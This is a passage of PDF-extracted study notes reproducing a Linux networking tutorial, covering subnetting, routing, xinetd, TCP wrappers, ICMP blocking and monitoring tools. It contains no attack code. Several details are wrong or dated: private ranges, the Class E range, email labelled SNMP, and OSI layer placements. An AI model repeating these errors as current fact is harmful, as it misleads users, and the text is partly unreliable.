FormatCLASS AHOSTS

CLASS AMASK

CLASS BHOSTS

CLASS BMASK

CLASS CHOSTS

CLASS CMASK

CLASS C SUBHOSTS

CLASS C SUBMASK

255 1 or 256 /32 16,777,214 255.0.0.0 65,534 255.255.0.0 254 255.255.255.0Invalid1 address

255.255.255.255

254 128 /31 33,554,430 254.0.0.0 131,070 255.254.0.0 510 255.255.254.0Invalid2 addresses

255.255.255.254

252 64 /30 67,108,862 252.0.0.0 262,142 255.252.0.0 1,022 255.255.252.02 hosts4 addresses

255.255.255.252

248 32 /29 134,217,726 248.0.0.0 524,286 255.248.0.0 2,046 255.255.248.06 hosts8 addresses

255.255.255.248

240 16 /28 268,435,454 240.0.0.0 1,048,574 255.240.0.0 4,094 255.255.240.014 hosts16 addresses

255.255.255.240

224 8 /27 536,870,910 224.0.0.0 2,097,150 255.224.0.0 8,190 255.255.224.030 hosts32 addresses

255.255.255.224

192 4 /26 1,073,741,822 192.0.0.0 4,194,302 255.192.0.0 16,382 255.255.192.062 hosts64 addresses

255.255.255.192

128 2 /25 2,147,483,646 128.0.0.0 8,388,606 255.128.0.0 32,766 255.255.128.0126 hosts128 addresses

255.255.255.128

Binary position 8 7 6 5 4 3 2 1

Value 128 64 32 16 8 4 2 1

Example: 192 1 1 0 0 0 0 0 0

Example 192=128+64 Some addresses are reserved and outside this scope. Loopback (127.0.0.1), reserved class C 192.168.XXX.XXX, reserved class B 172.31.XXX.XXX and reserved class A 10.XXX.XXX.XXX. Subnet Example:

Your ISP assigns you a subnet mask of 255.255.255.248 for your office. 208.88.34.104 Network Base address 208.88.34.105 Computer 1 208.88.34.106 Computer 2

Page 39: Appunti Informatica

208.88.34.107 Computer 3 208.88.34.108 Computer 4 208.88.34.109 Computer 5 208.88.34.110 DSL router/Gateway 208.88.34.111 Broadcast address

Of the eight addresses, there are six assigned to hardware systems and ultimately only five usable addresses.

Links: What's A Netmask And Why Do I Need One? Subnet Cheat Sheet Subnet calculator CIDR Converstion Table Table of subnets IP Subnetting, Variable Subnetting, and CIDR (Supernetting) CISCO.com: Subnet Masking and Addressing

Network Classes:The concept of network classes is a little obsolete as subnets are now used to define smaller networks. These subnets may be part of a class A, B, C, etc network. For historical reference the network classes are defined as follows:

Class A: Defined by the first 8 bits with a range of 0 - 127. First number (8 bits) is defined by Internic i.e. 77.XXX.XXX.XXX One class A network can define 16,777,214 hosts. Range: 0.0.0.0 - 127.255.255.255

Class B: Defined by the first 8 bits with a range from 128 - 191 First two numbers (16 bits) are defined by Internic i.e. 182.56.XXX.XXX One class B network can define 65,534 hosts. Range: 128.0.0.0 - 191.255.255.255

Class C: Defined by the first 8 bits with a range from 192 - 223 First three numbers (24 bits) are defined by Internic i.e. 220.56.222.XXX One class B network can define 254 hosts. Range: 192.0.0.0 - 223.255.255.255

Class D: Defined by the first 8 bits with a range from 224 - 239 This is reserved for multicast networks (RFC988) Range: 224.0.0.0 - 239.255.255.255

Class E: Defined by the first 8 bits with a range from 240 - 255 This is reserved for experimental use. Range: 240.0.0.0 - 247.255.255.255

Enable Forwarding:Forwarding allows the network packets on one network interface (i.e. eth0) to be forwarded to another network interface (i.e. eth1). This will allow the Linux computer to conect ("ethernet bridge") or route network traffic. The bridge configuration will merge two (or several) networks into one single network topology. IpTables firewall rules can be used to filter traffic. A router configuration can support multicast and basic IP routing using the "route" command. IP masquerading (NAT) can be used to connect private local area networks (LAN) to the internet or load balance servers.

Page 40: Appunti Informatica

Turn on IP forwarding to allow Linux computer to act as a gateway or router. echo 1 > /proc/sys/net/ipv4/ip_forward Default is 0. One can add firewall rules by using ipchains.

Another method is to alter the Linux kernel config file: /etc/sysctl.conf Set the following value:

net.ipv4.ip_forward = 1

See file /etc/sysconfig/network for storing this configuration. FORWARD_IPV4=true

Change the default "false" to "true".

All methods will result in a proc file value of "1". Test: cat /proc/sys/net/ipv4/ip_forward The TCP Man page - Linux Programmer's Manual and /usr/src/linux/Documentation/proc.txt (Kernel 2.2 RH 7.0-) [alt link] cover /proc/sys/net/ipv4/* file descriptions. Alos see: (YoLinux tutorials)

Configure Linux as an internet gateway router: Using Linux and iptables/ipchains to set up an internet gateway for home or office (iptables)

Load balancing servers using LVS (Linux Virtual Server) (ipvsadm)

Adding a network interface card (NIC):Manual method: This does not alter the permanent configuration and will only configure support until the next reboot.

cd /lib/modules/2.2.5-15/net/ - Use kernel version for your system. This example uses 2.2.5-15 Here you will find the modules supported by your system. It can be permanently added to /etc/modules.conf (or for older systems: /etc/conf.modules) Example:

alias eth0 3c59x

/sbin/insmod -v 3c59x (For a 3Com ethernet card) ifconfig ...

The easy way: Red Hat versions 6.2 and later, ship with Kudzu, a device detection program which runs during system initialization. (/etc/rc.d/init.d/kudzu) This can detect a newly installed NIC and load the appropriate driver. Then use /usr/sbin/netconfig to configure the IP address and network settings. The configuration will be stored so that it will be utilized upon system boot. Systems with two NIC cards: Typically two cards are used when connecting to two networks. In this case the device must be defined using one of three methods:

1. Use the Red Hat GUI tool /usr/bin/netcfg

OR

2. Define network parameters in configuration files:

Define new device in file (Red Hat/Fedora) /etc/sysconfig/network-scripts/ifcfg-eth1 (S.u.s.e 9.2: /etc/sysconfig/network/ifcfg-eth-id-XX:XX:XX:XX:XX)

DEVICE=eth1BOOTPROTO=staticIPADDR=192.168.10.12

Page 41: Appunti Informatica

NETMASK=255.255.255.0GATEWAY=XXX.XXX.XXX.XXXHOSTNAME=node-name.name-of-domain.comDOMAIN=name-of-domain.com

Special routing information may be specified, if necessary, in the file (Red Hat/Fedora): /etc/sysconfig/static-routes (S.u.s.e. 9.2: /etc/sysconfig/network/routes)

Example: eth1 net XXX.XXX.XXX.0 netmask 255.255.255.0 gw XXX.XXX.XXX.XXX

OR 3. Define network parameters using Unix command line interface:

Define IP address:

ifconfig eth0 XXX.XXX.XXX.XXX netmask 255.255.255.0 broadcast XXX.XXX.XXX.255 ifconfig eth1 192.168.10.12 netmask 255.255.255.0 broadcast 192.168.10.255

If necessary, define route with with the route command: Examples: route add default gw XXX.XXX.XXX.XXX dev eth0 route add -net XXX.XXX.XXX.0 netmask 255.255.255.0 gw XXX.XXX.XXX.XXX dev eth0

Where XXX.XXX.XXX.XXX is the gateway to the internet as defined by your ISP or network operator.

If a mistake is made just repeat the route command substituting "del" in place of "add".

Configuring your NIC: Speed and Duplex settings:This is usually not necessary because most ethernet adapters can auto-negotiate link speed and duplex setting.

List NIC speed and configuration: mii-tool eth0: negotiated 100baseTx-FD flow-control, link ok

Verbose mode: mii-tool -v

eth0: negotiated 100baseTx-FD flow-control, link ok product info: Intel 82555 rev 4 basic mode: autonegotiation enabled basic status: autonegotiation complete, link ok capabilities: 100baseTx-FD 100baseTx-HD 10baseT-FD 10baseT-HD advertising: 100baseTx-FD 100baseTx-HD 10baseT-FD 10baseT-HD flow-control link partner: 100baseTx-FD 100baseTx-HD 10baseT-FD 10baseT-HD flow-control

Set NIC configuration: mii-tool -F option

Option Parameters

-F 100baseTx-FD100baseTx-HD10baseT-FD10baseT-HD

-A 100baseT4100baseTx-FD100baseTx-HD10baseT-FD

Page 42: Appunti Informatica

10baseT-HD

Query NIC with ethtool:

Command Description

ethtool -g eth0 Queries ethernet device for rx/tx ring parameter information.

ethtool -a eth0 Queries ethernet device for pause parameter information.

ethtool -c eth0 Queries ethernet device for coalescing information.

ethtool -i eth0 Queries ethernet device for associated driver information.

ethtool -d eth0 Prints a register dump for the specified ethernet device.

ethtool -k eth0 Queries ethernet device for offload information.

ethtool -S eth0 Queries ethernet device for NIC and driver statistics.

Man Pages: mii-tool - view, manipulate media-independent interface status ethtool - Display or change ethernet card settings

Route:Static routes: IP (Internet Protocol) uses a routing table to determine where packets should be sent. First the packet is examined to see if its' destination is for the local or remote network. If it is to be sent to a remote network, the routing table is consulted to determine the path. If there is no information in the routing table then the packet is sent to the default gateway. Static routes are set with the route command and with the configuration file (Red Hat/Fedora): /etc/sysconfig/network-scripts/route-eth0 or (Red Hat 7: /etc/sysconfig/static-routes) (S.u.s.e. 9.2: /etc/sysconfig/network/routes):

10.2.3.0/16 via 192.168.10.254

See command: /etc/sysconfig/network-scripts/ifup-routes eth0 Dynamic routes: RIP (Routing Information Protocol) is used to define dynamic routes. If multiple routes are possible, RIP will choose the shortest route. (Fewest hops between routers not physical distance.) Routers use RIP to broadcast the routing table over UDP port 520. The routers would then add new or improved routes to their routing tables. Man pages:

route - show / manipulate the IP routing table (Static route) Examples:

o Show routing table: route -e o Access individual computer host specified via network interface card eth1:

route add -host 123.213.221.231 eth1 o Access ISP network identified by the network address and netmask using network interface

card eth0: route add -net 10.13.21.0 netmask 255.255.255.0 gw 192.168.10.254 eth0 Conversly: route del -net 10.13.21.0 netmask 255.255.255.0 gw 192.168.10.254 eth0

o Specify default gateway to use to access remote network via network interface card eth0: route add default gw 201.51.31.1 eth0 (Gateway can also be defined in /etc/sysconfig/network)

DOS

Page 43: Appunti Informatica

Route –p [ persistent ]add 192.168.8.0 mask 255.255.255.0 10.40.5.101 [ il gateway ]

o Specify two gateways for two network destinations: (i.e. one external, one internal private network. Two routers/gateways will be specified.) Add internet gateway as before: route add default gw 201.51.31.1 eth0 Add second private network: route add -net 10.0.0.0 netmask 255.0.0.0 gw 192.168.10.254 eth0

routed - network routing daemon. Uses RIP protocol to update routing table. ipx_route - show / manipulate the IPX routing table - IPX is the Novell networking protocol (Not

typically used unless your office has Novell servers) ifuser - Identify destinations routed to a particular network interface.

VPN, Tunneling: Commercial VPN Linux software solutions - YoLinux CIPE: Crypto IP Encapsulation (Easiest way to configure two Linux gateways connecting two private

networks over the internet with encryption.) o CIPE Home page - CIPE is a simple encapsulation system that securely connects two subnets. o VPN, Firewall, Gateway Mini How To - Keith Hasely o The Linux Cipe+Masquerading mini-HOWTO - Anthony Ciaravalo

Freeswan IPSec - An IPSec project for Linux (known as Freeswan and KLIPS). GRE Tunneling - Hugo Samayoa VPN HowTo - Matthew D. Wilson Linux VPN support - PPTP, L2TP, ppp over SSH tunnel, VPN support working with 128-bit rc4

encryption. By Michael Elkins Installing and Running PPTP on Linux Tunnel Vision VPN for Linux - creates an encrypted VPN between two Tunnel Vision-capable sites. Linux VPN Masquerade Cerberus - An IPsec implementation for Linux L2TPD - Layer Two Tunneling Protocol. (For PPP) L2TP Extensions (l2tpext) Internet Drafts . Description of the CISCO VPN at Cal Tech - Supports Linux (kernel 2.2), Solaris, MS/Windows

95/98/ME/NT/2000, Mac OS X/7.6-9.x

Usefull Linux networking commands: /etc/rc.d/init.d/network   start - command to start, restart or stop the network netstat - Display connections, routing tables, stats etc

o List externally connected processes: netstat -punta o List all connected processes: netstat -nap o Show network statistics: netstat -s o Kernel interface table info: netstat -a -i eth0

ping - send ICMP ECHO_REQUEST packets to network hosts. Use Cntl-C to stop ping. traceroute - print the route packets take to network host

o traceroute IP-address-of-server o traceroute domain-name-of-server

mtr - a network diagnostic tool introduced in Fedora - Like traceroute except it gives more network quality and network diagnostic info. Leave running to get real time stats. Reports best and worst round trip times in milliseconds.

o mtr IP-address-of-server o mtr domain-name-of-server

Page 44: Appunti Informatica

whois - Lookup a domain name in the internic whois database. finger - Display information on a system user. i.e. finger user@host Uses $HOME/.plan and

$HOME/.project user files. Often used by game developers. See http://finger.planetquake.com/ iptables - IP firewall administration (Linux kernel 2.6/2.4) See YoLinux firewall/gateway

configuration. ipchains - IP firewall administration (Linux kernel 2.2) See YoLinux firewall/gateway configuration. socklist - Display list of open sockets, type, port, process id and the name of the process. Kill with

fuser or kill. host - Give a host name and the command will return IP address. Unlike nslookup, the host

command will use both /etc/hosts as well as DNS. Example: host domain-name-of-server

nslookup - Give a host name and the command will return IP address. Also see Testing your DNS (YoLinux Tutorial) Note that nslookup does not use the /etc/hosts file.

inetd/xinetd: Network Socket Listener Daemons:The network listening daemons listen and respond to all network socket connections made on the TCP/IP ports assigned to it. The ports are defined by the file /etc/services. When a connection is made, the listener will attempt to invoke the assigned program and pipe the data to it. This simplified matters by allowing the assigned program to read from stdin instead of making its own sockets connection. The listener hadles the network socket connection. Two network listening and management daemons have been used in Red Hat Linux distributions:

inetd: Red Hat 6.x and older xinetd: Red Hat 7.0-9.0, Fedora Core

inetd:Configuration file: /etc/inetd.conf Entries in this file consist of a single line made up of the following fields: service socket-type protocol wait user server cmdline

service: The name assigned to the service. Matches the name given in the file /etc/services socket-type:

o stream: connection protocols (TCP) o dgram: datagram protocols (UDP) o raw o rdm o seqpacket

protocol: Transport protocol name which matches a name in the file /etc/protocols. i.e. udp, icmp, tcp, rpc/udp, rpc/tcp, ip, ipv6

wait: Applies only to datagram protocols (UDP). o wait[.max]: One server for the specified port at any time (RPC) o nowait[.max]: Continue to listen and launch new services if a new connection is made.

(multi-threaded)

Max refers to the maximum number of server instances spawned in 60 seconds. (default=40)

user[.group]: login id of the user the process is executed under. Often nobody, root or a special restricted id for that service.

server: Full path name of the server program to be executed. cmdline: Command line to be passed to the server. This includes argument 0 (argv[0]), that is

the command name. This field is empty for internal services. Example of internal TCP

Page 45: Appunti Informatica

services: echo, discard, chargen (character generator), daytime (human readable time), and time (machine readable time). (see RFC)

Sample File: /etc/inetd.conf #echo stream tcp nowait root internal#echo dgram udp wait root internal

ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a#pop-3 stream tcp nowait root /usr/sbin/tcpd ipop3d#swat stream tcp nowait.400 root /usr/sbin/swat swat

A line may be commented out by using a '#' as the first character in the line. This will turn the service off. The maximum length of a line is 1022 characters. The inet daemon must be restarted to pick up the changes made to the file: /etc/rc.d/init.d/inetd restart For more information see the man pages "inetd" and "inetd.conf".

xinetd: Extended Internet Services Daemon:Xinetd has access control machanisms, logging capabilities, the ability to make services available based on time, and can place limits on the number of servers that can be started, redirect services to different ports and network interfaces (NIC) or even to a different server, chroot a service etc... and thus a worthy upgrade from inetd. Use the command chkconfig --list to view all system services and their state. It will also list all network services controlled by xinetd and their respective state under the title "xinetd based services". (Works for xinetd (RH7.0+) but not inetd) The xinetd network daemon uses PAM also called network wrappers which invoke the /etc/hosts.allow and /etc/hosts.deny files. Configuration file: /etc/xinetd.conf which in turn uses configuration files found in the directory /etc/xinetd.d/. To turn a network service on or off:

Edit the file /etc/xinetd.d/service-name Set the disable value:

disable = yes or disable = no

Restart the xinetd process using the signal:

o SIGUSR1 (kill -SIGUSR1 process-id) - Soft reconfiguration does not terminate existing connections. (Important if you are connected remotely)

o SIGUSR2 - Hard reconfiguration stops and restarts the xinetd process.

(Note: Using the HUP signal will terminate the process.) OR

Use the chkconfig command: chkconfig service-name on (or off) This command will also restart the xinetd process to pick up the new configuration.

The file contains entries of the form: service service-name { attribute assignment-operator value value ... ... {

Page 46: Appunti Informatica

Where: attribute:

o disable: yes no

o type: RPC INTERNAL: UNLISTED: Not found in /etc/rpc or /etc/services

o id: By default the service id is the same as the service name. o socket_type:

stream: TCP dgram: UDP raw: Direct IP access seqpacket: service that requires reliable sequential datagram transmission

o flags: Combination of: REUSE, INTERCEPT, NORETRY, IDONLY, NAMEINARGS, NODELAY, DISABLE, KEEPALIVE, NOLIBWRAP. See the xinetd man page for details.

o protocol: Transport protocol name which matches a name in the file /etc/protocols. o wait:

no: multi-threaded yes: single-threaded - One server for the specified port at any time (RPC)

o user: See file : /etc/passwd o group: See file : /etc/group o server: Program to execute and recieve data stream from socket. (Fully qualified name

- full pathe name of program) o server_args: Unlike inetd, arg[0] or the name of the service is not passed. o only_from: IP address, factorized address, netmask range, hostname or network name

from file /etc/networks. o no_access: Deny from ... (inverse of only_from) o access_times o port: See file /etc/services

Also: log_type, log_on_success, log_on_failure (Log options: += PID,HOST,USERID,EXIT,DURATION,ATTEMPT and RECORD), rpc_version, rpc_number, env, passenv, redirect, bind, interface, banner, banner_success, banner_fail, per_source, cps, max_load, groups, enabled, include, includedir, rlimit_as, rlimit_cpu, rlimit_data, rlimit_rss, rlimit_stack. The best source of information is the man page and its many examples.

assignment-operator: o = o +=: add a value to the set of values o -=: delete a value from the set of values

Then restart the daemon: /etc/rc.d/init.d/xinetd restart Example from man page: Limit telnet sessions to 8 Mbytes of memory and a total 20 CPU seconds for child processes. service telnet{ socket_type = stream wait = no nice = 10 user = root server = /usr/etc/in.telnetd

Page 47: Appunti Informatica

rlimit_as = 8M rlimit_cpu = 20}

[Pitfall] Red Hat 7.1 with updates as of 07/06/2001 required that I restart the xinetd services before FTP would work properly even though xinetd had started without failure during the boot sequence. I have no explanation as to why this occurs or how to fix it other than to restart xinetd: /etc/rc.d/init.d/xinetd restart. Man Pages:

xinetd xinetd.conf xinetd.log tcpd

For more info see: macsecurity.org: xinetd tutorial - by curator LinuxFocus.org: xinetd - Frederic Raynal RedHat.com: Controlling Access to Services http://www.xinetd.org See RFC's: 862, 863, 864, 867, 868, 1413. man page xinetd, xinetd.conf, xinetd.log

RPC: Remote Procedure Calls (Portmapper)Portmpper is a network service required to support RPC's. Many services such as NFS (file sharing services) require portmapper. List RPC services supported: [root]# rpcinfo -p localhost Starting portmap server:

/etc/rc.d/init.d/portmap start service portmap start (Red Hat/Fedora Core)

Man Pages: portmap rpcinfo pmap_set pmap_dump

PAM: Network Wrappers:Pluggable Authentication Modules for Linux (TCP Wrappers) This system allows or denies network access. One can reject or allow specific IP addresses or subnets to access your system. File: /etc/hosts.allow in.ftpd:208.188.34.105

This specifically allows the given IP address to ftp to your system. One can also specify an entire domain. i.e. .name-of-domain.com Note the beginning ".". File: /etc/hosts.deny ALL:ALL

This generally denies any access. See the pam man page. File: /etc/inetd.conf

ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a

Page 48: Appunti Informatica

The inet daemon accepts the incoming network stream and assigns it to the PAM TCP wrapper, /usr/sbin/tcpd, which accepts or denies the network connection as defined by /etc/hosts.allow and /etc/hosts.deny and then passes it along to ftp. This is logged to /var/log/secure

Advanced PAM: More specific access can be assigned and controlled by controlling the level of authentication required for access. Files reflect the inet service name. Rules and modules are stacked to achieve the level of security desired. See the files in /etc/pam.d/... (some systems use /etc/pam.conf) The format: service type control module-path module-arguments

auth - (type) Password is required for the user o nullok - Null or non-existatant password is acceptable o shadow - encrypted passwords kept in /etc/shadow

account - (type) Verifies password. Can track and force password changes. password - (type) Controls password update

o retry=3 - Sets the number of login attempts o minlen=8 - Set minimum length of password

session - (type) Controls monitoring

Modules: /lib/security/pam_pwdb.so - password database module /lib/security/pam_shells.so - /lib/security/pam_cracklib.so - checks is password is crackable /lib/security/pam_listfile.so

After re-configuration, restart the inet daemon: killall -HUP inetd For more info see:

Wietse's Papers Pluggable Authentication Modules for Linux (PAM) Home Page

ICMP:ICMP is the network protocol used by the ping and traceroute commands. ICMP redirect packets are sent from the router to the host to inform the host of a better route. To enable ICMP redirect, add the following line to /etc/sysctl.conf :

net.ipv4.conf.all.accept_redirects = 1

Add the following to the file: /etc/rc.d/rc.local for f in /proc/sys/net/ipv4/conf/*/accept_redirectsdo echo 1 > $f done

Command to view Kernel IP routing cache: /sbin/route -Cn NOTE: This may leave you vulnerable to hackers as attackers may alter your routes.

Blocking ICMP and look invisible to ping:The following firewall rules will drop ICMP requests.

Iptables: iptables -A OUTPUT -p icmp -d 0/0 -j DROP

Ipchains: ipchains -A output -p icmp -d 0/0 -j DENY

OR drop all incomming pings: echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all

This is sometimes necessary to look invisible to DOS (Denial Of Service) attackers who use ping to watch your machine and launch an attack when it's pressence is detected

Page 49: Appunti Informatica

Network Monitoring Tools: tcpdump - dump traffic on a network. See discussion below.

Command line option Description

-c Exit after receiving count packets.

-C Specify size of output dump files.

-i Specify interface if multiple exist. Lowest used by default. i.e. eth0

-w file-name Write the raw packets to file rather than parsing and printing them out.They can later be printed with the -r option.

-n Improve speed by not performing DNS lookups. Report IP addresses.

-t Don't print a timestamp on each dump line.

Filter expressions:

primitive Description

host host-name If host has multiple IP's, all will be checked.

net network-number Network number.

net network-number mask mask Network number and netmask specified.

port port-number Port number specified.

tcp Sniff TCP packets.

udp Sniff UDP packets.

icmp Sniff icmp packets.

Examples: o tcpdump tcp port 80 and host server-1 o tcpdump ip host server-1 and not server-2

iptraf - Interactive Colorful IP LAN Monitor nmap - Network exploration tool and security scanner

o List pingable nodes on network: nmap -sP 192.168.0.0/24 Scans network for IP addresses 192.168.0.0 to 192.168.0.255 using ping.

Ethereal - Network protocol analyzer. Examine data from a live network.

RPM's required: o ethereal-0.8.15-2.i386.rpm - Red Hat 7.1 Powertools CD RPM o ucd-snmp-4.2-12.i386.rpm - Red Hat 7.1 binary CD 1 o ucd-snmp-utils-4.2-12.i386.rpm - Red Hat 7.1 binary CD 1 o Also: gtk+, glib, glibc, XFree86-libs-4.0.3-5 (base install)

There is an error in the ethereal package because it does not show the snmp libraries as a dependancies, but you can deduce this from the errors that you get if the ucd-snmp libraries are not installed.

EtherApe - Graphical network monitor for Unix modeled after etherman. This is a great network discovery program with cool graphics. (Red Hat Powertools CD 7.1)

Gkrellm - Network and system monitor. Good for monitoring your workstation. (Red Hat Powertools CD)

IPTraf - ncurses-based IP LAN monitor. (Red Hat Powertools CD) Cheops - Network discovery, location, diagnosis and management. Cheops can identify all of the

computers that are on your network, their IP address, their DNS name, the operating system they are running. Cheops can run a port scan on any system on your network. (Red Hat Powertools CD)

ntop - Shows network usage in a way similar to what top does for processes. Monitors how much data is being sent and received on your network. (Red Hat Powertools CD)

Page 50: Appunti Informatica

MRTG - Multi Router Traffic Grapher - Monitor network traffic load using SNMP and generate an HTML/GIF report. (See sample output)

dnsad - IP traffic capture. Export to Cisco Netflow for network analysis reporting. scotty - Obtain status and configuration information about your network. Supports SNMP, ICMP,

DNS, HTTP, SUN RPC, NTP, & UDP. (Red Hat Powertools CD) Big Brother - Monitoring ans services availablility. OpenNMS.org - Network Management using SNMP. Also see Blast.com: OpenNMS Nagios - host, service and network monitoring Caldera guide - Network Monitoring Tools Angel network monitor Bing: Measure bandwidth between two systems - Bandwidth ping

Using tcpdump to monitor the network:

[root@node prompt]# ifconfig eth0 promisc - Put nic into promiscuous mode to sniff traffic.[root@node prompt]# tcpdump -n host not XXX.XXX.XXX.XXX | more - Sniff traffic but ignore IP address which is your remote session.[root@node prompt]# ifconfig eth0 -promisc - Pull nic out of promiscuous mode.

Network Intrusion and Hacker Detection Systems:SNORT: Monitor the network, performing real-time traffic analysis and packet logging on IP networks for the detection of an attack or probe.

Linux Journal: Planning IDS for Your Enterprise - Nalneesh Gaur Snort overview - Drew Beach InterSect Alliance - Intrusiuon analysis. Identifies malicious or unauthorized access attempts.

ARP: Adress Resolution ProtocolEthernet hosts use the Address Resolution Protocol (ARP) to convert a 32-bit internet IP addresses into a 48-bit Ethernet MAC address used by network hardware. (See: RFC 826) ARP broadcasts are sent to all hosts on the subnet by the data transmitting host. The broadcast is ignored by all except the intended receiver which recognizes the IP address as its own. Computers on the subnet typically keep a cache of ARP responses. ARP broadcasts are passed on by hubs and switches but are blocked by routers. Reverse ARP (See: RFC 903) is a bootstrap protocol which allows a client to broadcast requesting a server to reply with its IP address.

arp (8) man page - manipulate the system ARP cache Shows other systems on your network (including IP address conflicts): arp -a Show ARP table Linux style: arp -e arpwatch (8) man page - keep track of ethernet/ip address pairings arpsnmp (8) man page - keep track of ethernet/ip address pairings. Reads information generated by

snmpwalk arping (8) man page - send ARP REQUEST to a neighbor host

Print ARP reply (similar to arp -a): arping 192.168.10.99 List ARP table: cat /proc/net/arp ip (8) man page - show / manipulate routing, devices, policy routing and tunnels

View ARP table: ip neighbor

Page 51: Appunti Informatica

ARP is something that simply works. No Linux system configuration is necessary. It's all part of the ethernet and IP protocol. The aforementioned information is just part of the Linux culture of full visibility into what is going on.

Configuring Linux For Network Multicast:Regular network exchanges of data are pier to pier unicast transactions. An HTTP request to a web server (TCP/IP), email SNMP (TCP/IP), DNS (UDP), FTP (TCP/IP), ... are all pier to pier unicast transactions. If one wants to transmit a video, audio or data stream to multiple nodes with one transmission stream instead of multiple individual pier to pier connections, one for each node, one may use multicasting to reduce network load. Note that multicast and a network broadcast are different. Multicast messages are only "heard" by the nodes on the network that have "joined the multicast group" which are those that are interested in the information. The Linux kernel is full Level-2 Multicast-Compliant. It meets all requirements to send, receive and act as a router for multicast datagrams. For a process to receive multicast datagrams it has to request the kernel to join the multicast group and bind the port receiving the datagrams. When a process is no longer interested in the multicast group, a request is made to the kernel to leave the group. It is the kernel/host which joins the multicast group and not the process. Kernel configuration requires "CONFIG_IP_MULTICAST=y". In order for the Linux kernel to support multicast routing, set the following in the kernel config:

CONFIG_IP_MULTICAST=y CONFIG_IP_ROUTER=y CONFIG_IP_MROUTE=y CONFIG_NET_IPIP=y

Note that on multihomed systems (more than one IP address/network card), only one device can be configured to handle multicast. Class D networks with a range of IP addresses from 224.0.0.0 to 239.255.255.255 (See Network Classes above) have typically been reserved for multicast. Usefull commands:

Command Description

cat /proc/net/igmpList multicast group to which the host is subscribed. Use "Internet Group Management Protocol".(See /usr/src/linux/net/core/igmp.c)

cat /proc/net/dev_mcast

List multicast interfaces.(See /usr/src/linux/net/core/dev_mcast.c)

ping 224.0.0.1 All hosts configured for multicast will respond with their IP addresses

ping 224.0.0.2 All routers configured for multicast will respond

ping 224.0.0.3 All PIM routers configured for multicast will respond

ping 224.0.0.4 All DVMRP routers configured for multicast will respond

ping 224.0.0.5 All OSPF routers configured for multicast will respond

Multicast transmissions are achieved through proper routing, router configuration (if communicating through subnets) and programatically with the use of the following "C" function library calls:

Function Call Description

setsockopt() Pass information to the Kernel.

getsockopt() Retrieve information broadcast using multicast.

For more on multicast programming see: Multicast Howto. The multicast application will specify the multicast loopback interface, TTL (network time to live), network interface and the multicast group to add or drop.

Add route to support multicast: route add 224.0.0.0 netmask 240.0.0.0 dev eth0

Page 52: Appunti Informatica

Living in a MS/Windows World: In Nautilus use the URL "smb:" to view MS/Windows servers. LinNeighborhood: Linux workstation gui tool.

Make your life simple and use the GUI/File Manager LinNeighborhood. It uses smbmount, samba and smbclient to give you access to MS/Windows servers and printers.

o LinNeighborhood Home Page o LinNeighborhood Screen Shot

See the YoLinux tutorial on integrating Linux into a Microsoft network.

Network Definitions: IPv4: Most of the Internet servers and personal computers use Internet Protocol version 4 (IPv4). This

uses 32 bits to assign a network address as defined by the four octets of an IP address up to 255.255.255.255. Which is the representation of four 8 bit numbers thus totaling 32 bits.

IPv6: Internet Protocol version 6 (IPv6) uses a 128 bit address and thus billions and billions of potential addresses. The protocol has also been upgraded to include new quality of service features and security. Currently Linux supports IPv6 but IPv4 is used when connecting your computer to the internet.

TCP/IP: (Transmission Control Protocol/Internet Protocol) uses a client - server model for communications. The protocol defines the data packets transmitted (packet header, data section), data integrity verification (error detection bytes), connection and acknowledgement protocol, and re-transmission.

TCP/IP time to live (TTL): This is a counting mechanism to determine how long a packet is valid before it reaches its destination. Each time a TCP/IP packet passes through a router it will decrement its TTL count. When the count reaches zero the packet is dropped by the router. This ensures that errant routing and looping aimless packets will not flood the network.

MAC Address: (media access control) is the network card address used for communication between other network devices on the subnet. This info is not routable. The ARP table maps TCP/IP address (global internet) to the local hardware on the local network. Use the command /sbin/ifconfig to view both the IP address and the MAC address. The MAC address uniquely identifies each node of a network and is used by the Ethernet protocol.

Full Duplex: Allows the simultaneous sending and receiving of packets. Most modern modems support full duplex.

Half Duplex: Allows the sending and receiving of packets in one direction at a time only. OSI 7 Layer Model: The ISO (International Standards Organization) has defined the OSI (Open

Systems Interconnection) model for current networking protocols.

OSI Layer Description Linux Networking Use

7 Application Layer.The top layer for communications applications like email and the web.

telnet, web browser, sendmail

6 Presentation Layer.Syntax and format of data transfer.

SMTP, http

5 Session Layer.

4 Transport Layer.Connection, acknowledgement and data packet transmission.

TCPUDP

3 Network Layer. IPARP

Page 53: Appunti Informatica

2 Data Link Layer.Error control, timing

Ethernet

1 Physical Layer.Electrical characteristics of signal and NIC

Ethernet

Network Hub: Hardware to connect network devices together. The devices will all be on the same network and/or subnet. All network traffic is shared and can be sniffed by any other node connected to the same hub.

Network Switch: Like a hub but creates a private link between any two connected nodes when a network connection is established. This reduces the amount of network collisions and thus improves speed. Broadcast messages are still sent to all nodes.

Related Links: Linux Network Management - Georgia Tech (Slovak mirror)

o Linux Network Commands Cable modem HowTo - Vladimir Vuksan Ethernet HowTo - Paul Gortmaker YoLinux Tutorial: Setting up an internet gateway for home or office using iptables Firewall HowTo - Mark Grennan ipchains HowTo - Paul Russell Networking Overview HowTo - Daniel Lopez Ridruejo Networking Howto - Joshua Drake NIS Howto - Thorsten Kukuk NFS Howto - Nicolai Langfeldt SNMP: Simple Network Management Protocol (Uses ports 161,162,391,1993)

o SNMP - Intro and tutorials o Linux SNMP Network Management Tools o SNMP FAQ o net-snmp - tools and libraries

News/Usenet Group: comp.os.linux.networking - Deja MARS-nwe - Netware emulator Caldera: Netware for Linux - Includes full NDS Linux 2.4 Advanced Routing HOWTO - iproute2, traffic shaping and a bit of netfilter ATM:

o ATM on Linux ISDN:

o ISDN4LINUX FAQ - Matthias Hessler o ISDN4 Linux Home Page o ISDN Solutions for Linux o Examples of ISDN for LINUX Installations o Dan Kegel's ISDN Page

DSL: o DSLreports.com: Reviews of DSL providers, bandwidth speed measurement, Tools, Info

PPP: Point-to-Point Protocol o YoLinux Tutorial: Configuring PPP dial up connections to an ISP o YoLinux Tutorial: Dialing Compuserve o YoLinux Tutorial: Dialing AOL o YoLinux Tutorial: Configuring PPP dial-in connections

PPTP: Point-to-Point Tunneling Protocol o RFC 2637: Point-to-Point Tunneling Protocol (PPTP) . o PoPToP - PPTP server for Linux.

Page 54: Appunti Informatica

o PPTP-Linux Client - A PPTP Linux client that allows a linux system to connect to a PPTP server. Developed by C. S. Ananian.

